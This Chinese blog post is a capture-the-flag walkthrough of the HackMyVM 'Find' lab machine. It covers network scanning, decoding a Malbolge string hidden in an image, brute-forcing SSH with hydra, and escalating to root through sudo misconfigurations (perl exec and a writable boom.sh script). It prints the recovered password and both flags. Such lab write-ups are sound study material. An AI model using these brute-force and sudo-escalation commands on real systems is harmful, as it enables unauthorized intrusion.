当前位置: 首页 > news >正文

HackMyVM-Find

news 来源:原创 2025/5/30 12:22:14

信息搜集

主机发现

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:39:60:4c, IPv4: 192.168.43.126
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.43.1    c6:45:66:05:91:88       (Unknown: locally administered)
192.168.43.137  08:00:27:d0:6b:60       PCS Systemtechnik GmbH
192.168.43.197  04:6c:59:bd:33:50       Intel Corporate3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.955 seconds (130.95 hosts/sec). 3 responded

端口扫描

┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -p- 192.168.43.137
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-28 05:14 EDT
Nmap scan report for find (192.168.43.137)
Host is up (0.000085s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:D0:6B:60 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 1.95 seconds
┌──(root㉿kali)-[~]
└─# nmap -sT -sV -O -p22,80 192.168.43.137      
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-28 05:17 EDT
Nmap scan report for find (192.168.43.137)
Host is up (0.00023s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
MAC Address: 08:00:27:D0:6B:60 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.68 seconds

漏洞利用

看一下80端口有什么

image

端口扫描

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.43.137 -w /home/kali/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,php,txt,jpg,png,zip,git
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.43.137
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/kali/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              git,html,php,txt,jpg,png,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10701]
/cat.jpg              (Status: 200) [Size: 35137]
/manual               (Status: 301) [Size: 317] [--> http://192.168.43.137/manual/]                                                                       
/robots.txt           (Status: 200) [Size: 13]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
/logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 279]
Progress: 9482032 / 9482040 (100.00%)
===============================================================
Finished
===============================================================

/robots.txt

image

/cat.jpg,将图片下载下载下来,发现有一串诡异的字符串

>C<;_"!~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJ`_dcba`_^]\Uy<XW
VOsrRKPONGk.-,+*)('&%$#"!~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONML
KJIHGFEDZY^W\[ZYXWPOsSRQPON0Fj-IHAeR

找大佬wp知道了,这是Malbolge编程语言,用https://malbolge.doleczek.pl/来看一下是什么

image

这应该就是用户名了,爆破一下ssh

┌──(kali㉿kali)-[~]
└─$ hydra -l missyred -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.43.137 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-28 10:56:08
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.43.137:22/
[22][ssh] host: 192.168.43.137   login: missyred   password: iloveyou
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-28 10:56:14

提权

找一下有没有可以用来提权的地方

missyred@find:~$ sudo -l
[sudo] password for missyred: 
Matching Defaults entries for missyred on find:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser missyred may run the following commands on find:(kings) /usr/bin/perl
missyred@find:~$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
missyred:x:1001:1001::/home/missyred:/bin/bash
kings:x:1002:1006::/home/kings:/bin/bash

image

成功提权到kings

missyred@find:~$ sudo -u kings /usr/bin/perl -e ' exec "/bin/sh";'
$ id
uid=1002(kings) gid=1006(kings) groups=1006(kings),1005(kingg)

user.txt

$ cat user.txt
f4e690f638c01bd8a19fb1349d40519c

看一下哪里可以利用进行提权

$ cat user.txt
f4e690f638c01bd8a19fb1349d40519c
$ sudo -l
Matching Defaults entries for kings on find:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser kings may run the following commands on find:(ALL) NOPASSWD: /opt/boom/boom.sh

提权

kings@find:~$ cd /opt
kings@find:/opt$ ls
kings@find:/opt$
kings@find:/opt$ mkdir /opt/boom
kings@find:/opt$ cd /opt/boom
kings@find:/opt/boom$ echo "/bin/bash" > /opt/boom/boom.sh
kings@find:/opt/boom$ chmod +x /opt/boom/boom.sh
kings@find:/opt/boom$ sudo /opt/boom/boom.sh
root@find:/opt/boom# id
uid=0(root) gid=0(root) groups=0(root)

root.txt

root@find:~# cat root.txt 
c8aaf0f3189e000006c305bbfcbeb790

相关文章:

  • LeetCode 1871. 跳跃游戏 VII(中等)
  • 面试题——计算机网络:HTTP和HTTPS的区别?
  • C++异步通信-future学习
  • nt!MmMapViewInSystemCache函数分析PointerPte的填充
  • 使用Vue + Element Plus实现可多行编辑的分页表格
  • APL Photonics封面成果:KAUST用五边形激光腔刷新物理随机数生成极限——800Gb/s!
  • Ovito建模并正交化方法
  • webstrorm 提示(This file does not belong to the project)此文件不属于该项目
  • MVCC原理解析
  • 扩展摩尔投票法:找出出现次数超过 n/3 的元素
  • DAY 36神经网络加速器easy
  • 网络协议之办公室网络是怎样的?
  • 实验设计与分析(第6版,Montgomery)第3章单因子实验:方差分析3.11思考题3.7 R语言解题
  • 卸载 Office PLUS
  • ZYNQ-PS与PL端BRAM数据交互
  • PortSwigger-03-点击劫持
  • 链路追踪神器zipkin安装详细教程教程
  • Redis击穿,穿透和雪崩详解以及解决方案
  • Polar编译码(SCL译码)和LDPC编译码(BP译码)的matlab性能仿真,并对比香浓限
  • BEVDepth- Acquisition of Reliable Depth for Multi-view 3D Object Detection
  • 北京网站建设熊掌号/百度seo关键词排名价格
  • 秦皇岛黄金海岸收费吗/青岛百度关键词优化
  • 网站开发好公司/长春网站建设 4435
  • linux网站架设怎么做/怎么制作网站平台
  • 政府门户网站建设管理工作总结/seo免费诊断电话
  • 网站关键字如何选择/华为手机业务最新消息